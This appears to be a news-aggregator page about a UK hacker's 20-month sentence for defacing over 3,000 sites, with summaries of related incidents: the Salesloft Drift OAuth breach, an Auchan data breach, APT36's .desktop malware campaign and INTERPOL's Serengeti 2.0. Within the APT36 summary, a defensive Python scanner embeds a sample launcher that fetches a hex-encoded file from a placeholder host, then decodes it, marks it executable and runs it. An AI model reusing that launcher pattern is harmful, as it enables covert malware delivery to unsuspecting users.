
UK Sentences Serial Hacker of 3,000 Sites to 20 Months in Prison

📰 2 unique sources, 2 articles

Summary


A 26-year-old UK resident, Al-Tahery Al-Mashriky, was sentenced to 20 months in prison for hacking more than 3,000 websites, including government and news sites in Yemen, Israel, the U.S., and Canada. Linked to extremist groups, he stole personal data from millions of Facebook users and defaced sites to post political messages. Al-Mashriky was arrested in August 2022 on information supplied by U.S. law enforcement and pleaded guilty to nine charges under the Computer Misuse Act in March 2025. His activity caused significant disruption to the targeted organizations and their users; it was motivated by political and ideological views, and the stolen data he held could have enabled further fraud. One of the groups he was affiliated with was the Yemen Cyber Army, a hacktivist group supporting the Houthis, which mainly spreads political messages by defacing websites and leaking data, targeting media outlets and government agencies.

Timeline

  1. 18.08.2025 19:36 📰 2 articles

    UK Sentences Serial Hacker of 3,000 Sites to 20 Months in Prison


Similar Happenings

Salesloft OAuth breach exposes Salesforce customer data via Drift AI chat agent

A threat actor, UNC6395, exploited OAuth tokens associated with the Drift AI chat agent to breach Salesloft and access customer data across multiple integrations, including Salesforce, Google Workspace, and others. The breach occurred between August 8 and 18, 2025, affecting over 700 organizations, including Zscaler, Palo Alto Networks, Cloudflare, Google Workspace, PagerDuty, Proofpoint, SpyCloud, and Tanium. The attackers targeted Salesforce instances and accessed email from a small number of Google Workspace accounts, exporting large volumes of data, including credentials and access tokens. Salesloft and Salesforce have taken steps to mitigate the breach and are advising affected customers to revoke API keys and rotate credentials. Salesloft will temporarily take Drift offline to enhance security. UNC6395 demonstrated operational security awareness by deleting query jobs, indicating a sophisticated approach. The breach highlights the risks of third-party integrations and the potential for supply chain attacks, and is unrelated to previous vishing attacks attributed to ShinyHunters. UNC6395 systematically exported large volumes of data from numerous corporate Salesforce instances, searching for secrets that could be used to compromise victim environments. The campaign is not limited to Salesforce customers who integrate their own solutions with the Salesforce service; it impacts all integrations using Salesloft Drift. There is no evidence that the breaches directly impacted Google Cloud customers. Organizations are urged to review all third-party integrations connected to their Drift instance, revoke and rotate credentials for those applications, and investigate all connected systems for signs of unauthorized access. The blast radius of the Salesloft Drift attacks remains uncertain, with the ultimate scope and severity still unclear. Numerous companies have disclosed downstream breaches resulting from this campaign, including Zscaler, Palo Alto Networks, Proofpoint, Cloudflare, and Tenable. Zscaler and Palo Alto Networks warned of potential social engineering attacks resulting from the campaign. Cloudflare confirmed that some customer support interactions may reveal information about a customer's configuration and could contain sensitive information such as access tokens. Okta successfully prevented a breach of its Salesforce instance by enforcing inbound IP restrictions, securing tokens with DPoP, and using the IPSIE framework; Okta recommends that organizations demand IPSIE integration from application vendors and implement an identity security fabric unified across applications. Palo Alto Networks' Unit 42 recommends conducting an immediate log review for signs of compromise and rotating exposed credentials. The breach started with the compromise of Salesloft's GitHub account between March and June 2025: UNC6395 accessed the account, downloaded content from multiple repositories, added a guest user, and established workflows. Reconnaissance activities occurred between March 2025 and June 2025 in the Salesloft and Drift application environments. Salesloft isolated the Drift infrastructure, application, and code, and took the application offline on September 5, 2025. Salesloft rotated credentials in the Salesloft environment and hardened it with improved segmentation controls between the Salesloft and Drift applications. Salesforce restored the integration with the Salesloft platform on September 7, 2025, but Drift remains disabled. Twenty-two companies have confirmed they were impacted by the supply chain breach. ShinyHunters and Scattered Spider were also involved in the Salesloft Drift attacks.

Data breach at Auchan exposes sensitive information of hundreds of thousands of customers

French retailer Auchan experienced a cyberattack that exposed sensitive personal data of several hundred thousand customers. The compromised data includes full names, titles, postal addresses, email addresses, phone numbers, and loyalty card numbers. The breach did not affect bank data, passwords, or PINs. The company has notified affected customers and the French Data Protection Authority (CNIL). Auchan has advised customers to be vigilant against potential phishing attacks using the stolen information. The incident follows similar breaches at other large French entities, but no evidence links these attacks to a coordinated campaign. This is the second data breach that Auchan has disclosed over the past year; the company sent the same notification to its customers in November 2024.

APT36 Linux .desktop File Abuse for Malware Delivery in Ongoing Espionage Campaign

APT36, a Pakistani cyber espionage group, is actively exploiting Linux .desktop files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. These files execute a payload that establishes persistent access and exfiltrates data. The attack leverages the 'Exec=' field in .desktop files to run shell commands, fetching and executing a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, capable of maintaining stealth and setting up persistence through cron jobs and systemd services. Communication with the command and control (C2) server is conducted over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.
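One way a defender can hunt for launchers of the kind described above is to parse .desktop files and flag Exec= lines that behave like downloaders rather than application launchers. The scanner below is an added example written for this page; it is not code from the article, from the researchers it summarizes, or from any vendor tool. The two embedded launchers, the example.invalid URL and the /tmp paths are constructed placeholders, not indicators from the campaign. The heuristics are assumptions about what distinguishes a download-and-execute launcher from a normal one: an inline shell wrapper, a downloader pointed at a remote URL, a hex or base64 decoder, a file written and made executable under /tmp, and a document-style Name whose Exec is not a document viewer.

```python
"""Heuristic scanner for suspicious Linux .desktop launchers (added example)."""
import os
import re
from configparser import ConfigParser, Error as ConfigError

# Constructed sample: a launcher whose Name mimics a PDF and whose Exec= line
# fetches, decodes and runs a file. URL and paths are placeholders.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Exec=bash -c "curl -fsSL https://example.invalid/p.txt | xxd -r -p > /tmp/.u && chmod +x /tmp/.u && /tmp/.u"
Terminal=false
"""

# Constructed benign launcher for comparison: a normal document viewer entry.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Document Viewer
Exec=evince %U
Icon=evince
Terminal=false
"""

# Heuristic patterns (assumptions, tuned for this example).
SHELL_WRAPPER = re.compile(r"\b(bash|sh)\s+-c\b")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
REMOTE_URL = re.compile(r"https?://\S+")
DECODER = re.compile(r"\b(xxd\s+-r|base64\s+(-d|--decode))")
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)
VIEWERS = re.compile(r"\b(evince|okular|xdg-open|libreoffice)\b")

# Directories where user-writable launchers commonly live (assumed defaults).
DEFAULT_DIRS = [
    os.path.expanduser("~/.local/share/applications"),
    os.path.expanduser("~/.config/autostart"),
    os.path.expanduser("~/Desktop"),
]


def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict, or {} if unparsable."""
    cp = ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # .desktop keys are case-sensitive
    try:
        cp.read_string(text)
    except ConfigError:
        return {}
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp["Desktop Entry"])


def scan_desktop(text):
    """Return a list of findings for one launcher; an empty list means clean."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "")
    findings = []
    if not exec_line:
        return findings
    if SHELL_WRAPPER.search(exec_line):
        findings.append("Exec wraps an inline shell command")
    if DOWNLOADER.search(exec_line) and REMOTE_URL.search(exec_line):
        findings.append("Exec fetches content from a remote URL")
    if DECODER.search(exec_line):
        findings.append("Exec decodes hex/base64 data before use")
    if "/tmp/" in exec_line and "chmod" in exec_line:
        findings.append("Exec writes and marks a file executable under /tmp")
    if DOC_NAME.search(name) and not VIEWERS.search(exec_line):
        findings.append("Name looks like a document but Exec is not a document viewer")
    return findings


def scan_directories(dirs=DEFAULT_DIRS):
    """Scan every .desktop file under the given directories; map path -> findings."""
    results = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for root, _, files in os.walk(d):
            for fn in files:
                if not fn.endswith(".desktop"):
                    continue
                path = os.path.join(root, fn)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        hits = scan_desktop(fh.read())
                except OSError:
                    continue
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, "->", scan_desktop(sample) or "no findings")
    for path, hits in scan_directories().items():
        print(path)
        for h in hits:
            print("  -", h)
```

Run it as a script to check the two embedded samples and then the user's own launcher directories; in production, feed the same scan_desktop function from an EDR file-event hook or a scheduled job, and treat any launcher with two or more findings as worth an analyst's look rather than an automatic block, since some legitimate installers also use Exec= wrappers.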

Operation Serengeti 2.0: INTERPOL-led Cybercrime Crackdown in Africa

Operation Serengeti 2.0, an INTERPOL-led international operation, resulted in the arrest of 1,209 cybercriminals across Africa and the UK. The operation targeted high-harm and high-impact cybercrimes, including ransomware, online scams, and business email compromise (BEC). Between June and August 2025, law enforcement seized $97.4 million and dismantled 11,432 malicious infrastructures linked to attacks on 87,858 victims worldwide. The operation involved investigators from 18 African countries and the UK, and utilized data from multiple private sector partners. Significant actions included the dismantling of 25 cryptocurrency mining centres in Angola, an online investment fraud operation in Zambia, and a transnational inheritance scam originating in Germany. Additionally, 45 illegal power stations and $37 million worth of mining and IT equipment were confiscated. A human trafficking network was also disrupted in Zambia. The operation also targeted a gang behind $300 million in investment fraud and a syndicate of Chinese nationals illegally mining cryptocurrency.